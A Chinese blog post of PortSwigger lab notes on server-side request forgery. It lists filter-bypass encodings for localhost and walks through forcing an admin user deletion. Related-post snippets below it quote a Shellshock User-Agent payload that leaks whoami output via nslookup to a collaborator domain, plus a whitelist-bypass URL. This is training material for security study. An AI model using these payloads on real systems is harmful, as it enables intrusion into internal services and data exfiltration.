SSRF(一):PortSwigger靶场笔记

最新推荐文章于 2025-11-20 18:34:40 发布
原创 最新推荐文章于 2025-11-20 18:34:40 发布 · 1.2k 阅读 · 12
标签
#笔记 #网络安全 #web安全

写在前面

该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
使用的工具为BurpSuite Pro
有问题请留言或联系邮箱1586937085@qq.com

漏洞简介

SSRF全称Server-Side Request Forgery(服务端请求伪造),这种漏洞允许攻击者操纵服务端向非预期目标发起请求
SSRF根据有无回显可分为普通SSRF和BlindSSRF
对使用黑名单机制防护SSRF可以使用以下方法绕过(以127.0.0.1,localhost举例

  • 对IP地址表示方式进行转化
    • 十进制:2130706433
    • 八进制:017700000001
    • 缩写:127.1
  • 注册自己的域名,解析为127.0.0.1,也可以直接使用spoofed.burpcollaborator.net
  • 对请求url进行多重url编码

Labs

lab1

lab地址:Basic SSRF against the local server
该lab关注的情景是部署网站的本地机器,即localhost
通过该lab的条件是访问http://localhost/admin,删除carlos的账户
进入lab先尝试所有功能,然后观察burp suite的http history,发现一个可能存在的SSRF
l1-s1.png
使用http://localhost/admin发送请求,发现返回了admin页面,但是在浏览器中进行删除不成功,显示必须要有admin权限才能操作再次观察响应,发现删除功能的api端点
l1-s2.png
l1-s3.png
构造删除请求,成功执行,通过

最低0.47元/天 解锁文章
h4ckb0ss
关注
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 2350
Portwigge的Web安全漏洞训练平台SSRF通关
【Burpsuit靶场记录】(后续题目更新到主页不同的漏洞专题)
asmartrman的博客
02-19 964
Burpsuit靶场记录(手续题目更新到主页不同的漏洞专题)
PortSwigger 服务端请求伪造 (SSRF
weixin_42451330的博客
11-18 1415
本文介绍PortSwigger靶场 服务端请求伪造 (SSRF),包括基本SSRF、另个系统SSRF、黑名单SSRF、白名单SSRF,重定向SSRF、盲外带SSRF。如有疑问欢迎私聊。
PortSwigger靶场(三)SSRF服务端请求伪造
weixin_52835927的博客
10-19 757
简单的来说就是有时候我们对网站进行黑盒测试,由于在我们攻击后,网站的安全设置让我们看不到回显,也就有漏洞也不知到在哪里,此时我们使用oast,将受攻击影响的地方通过请求回应时经过另外个服务器的信息表现出来,这样我们就知道我们的攻击造成了什么效果在这里我们只需要在referer头中换成collaborator中的url地址,然后发送过去,等待段时间之后就可以在collaborator中发现dns和http类型的改动,这时试验结束,这个实验其实是想教大家基本的带外注入方法,以便在接下来的实验使用。
portswigger靶场SSRF通关
m0_49197645的博客
10-19 1281
、针对本地服务器的基本 SSRF、针对本地服务器的基本 SSRF1、实验要求:该实验室具有库存检查功能,可以从内部系统获取数据。要解决该实验,请更改库存检查 URL 以访问管理界面,并删除用户carlos。2、实验步骤a、根据提示可以更改库存检查 URL 发现个参数stockApib、将上述请求包发送重放器直接将参数更改为stockApi=http%3a%2f%2flocalhost%2fadmin后发送请求,发现响应成功。
PortSwigger web实验室-SSRF(BP靶场)
2301_79933930的博客
10-20 1073
本次关于 BP 靶场中关于 SSRF 板块的学习分享就到这里啦~感兴趣的同学可以关注我哦!后续还会继续更新其他板块的学习内容⁂((✪⥎✪))⁂。
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1648
文章目录总结什么是SSRFSSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
【BurpSuite】SSRF | Server-side request forgery (1-5)
m0_71944965的博客
09-10 1304
进入靶场发现是个登录页面 用admin试试发现登录失败 按靶场提示去检查商品库存并抓包找到url将URL更改为访问管理界面 更改url后将抓包发送到 在Response中找到部分 将delete语句放到url中再放行 回到靶场,下图右上角变为即为成功 访问个产品,点击“检查库存”,在Burp Suite中拦截请求,并发送给Burp Intruder 清除§ 将将 stockApi 更改为http://192.168.0.1:8080/admin 给数字1增加§:点击Add§ 对ip进行爆破:Pay
SSRF-bp靶场
qq_53510194的博客
03-26 674
User-agent()输入 { :;/usr/bin/nslookup $(whoami).bp域名 执行命令。1.要求域名必须是stock.weliketoshop.net(常规的请求地址)在另翻页处(next product),发现类似的path参数,内容为路径。猜测两处公用个api(stockApi),构造新的stockApi进行测试。@绕过白名单,解码出来的#锁定127.0.0.1。url中的#:<域名>#<位置标识符>url中的@:<用户名>@<域名>找到删除用户的url,改包放包。
PortsWiggerLab: SSRF with filter bypass via open redirection vulnerability
如有错误感谢斧正
07-14 1014
carlos。
PortSwigger靶场CSRF最新版详细通关记录
LawnCat的博客
02-16 3272
该文章为portswigger中CSRF中绕过token篇。
网络安全SSRF+XXE漏洞挖掘笔记
kali_Ma的博客
10-23 2099
声明 本文仅供学习参考,其中涉及的切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果 、Server-side request forgery (SSRF) 01、Basic SSRF against the local server 描述 该实验室具有库存检查功能,可从内部系统获取数据。 为了解决实验室,更改股票检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。 解决方案 1.浏览/admin并观察您无法直接访问管理页面。 2.访问个产
SSRF专题-题解
asmartrman的博客
06-27 684
想系统学习SSRF,这个专题用来记录自己找的SSRF题目。
SSRF attacks against other back-end systems SSRF攻击其他后端系统
jamesP777的博客
05-11 436
有时候,应用服务器可以和用户连接不到的其他后端系统直接连接。这些后端系统通常是使用的私有IP地址。由于这些后端系统被网络拓扑结构保护起来了,所以安全性不高。多数的内部后端系统允许能够连接到他们的用户不经授权直接接入从而执行些敏感操作。在上个实验中,如果有个管理员接口在后端地址:https://192.168.0.68/admin,攻击者同样可以修改stocApi进行SSRF漏洞攻击。
SSRF盲打 & Collaborator everywhere
weixin_43263451的博客
10-06 5708
什么是盲SSRF漏洞? 和sql盲注样,就是不会在响应中得到SSRF攻击的反馈 如何寻找和利用盲SSRF漏洞? 与sql盲注相同,ssrf盲打最佳利用方式就是通过带外技术接收响应结果。也是同样使用burp自带的简易带外平台collaborator。即使有些HTTP流量会被拦截,也会因为不怎么拦截DNS流量而获取我们想要的结果。 有的情况还可以利用SSRF盲打对目标后端系统进行探测,比如探测目标网络中开放的主机及端口之类的,这些同样也可以通过带外通道接收到。 还有种情况就是所谓的反弹shell
Blind SSRF with Shellshock exploitation过关
wanggonghanfei的博客
05-08 242
burp suite靶场Blind SSRF with Shellshock exploitation
初级网络安全工程师必看:全网最强的SSRF+XXE漏洞挖掘笔记教程,黑客技术零基础入门到精通实战!
最新发布
QIANDXX的博客
11-20 1331
参数实体嵌套定义需要注意的是,内层的定义的参数实体% 需要进行HTML转义,否则会出现解析错误。广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
PortSwigger靶场之Basic SSRF against another back-end system通关秘籍
m0_65361643的博客
11-04 482
该实验利用SSRF漏洞,通过目标系统的库存检查功能发送恶意请求访问内网资源。攻击者修改stockApi参数,批量探测192.168.0.1-255网段的8080端口,找到开放的管理界面后,构造删除用户carlos的请求完成攻击。整个过程演示了SSRF漏洞如何绕过内网隔离访问敏感资源,核心在于服务器未能验证请求URL的合法性,导致攻击者可操控服务器发起内部网络请求。
PortSwigger靶场SSRF with whitelist-based input filter通关秘籍
m0_65361643的博客
11-10 581
摘要:该靶场通过URL解析差异绕过白名单过滤实现SSRF攻击。库存功能的stockApi参数存在白名单验证,仅允许stock.weliketoshop.net等域名。利用URL嵌入式凭据语法和双重编码#符号(%2523),构造形如"http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos"的请求。前端验证通过合法域名,而后端解析时%2523解码为#截断后续内容,实际请求内部管理接口删除用户。漏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值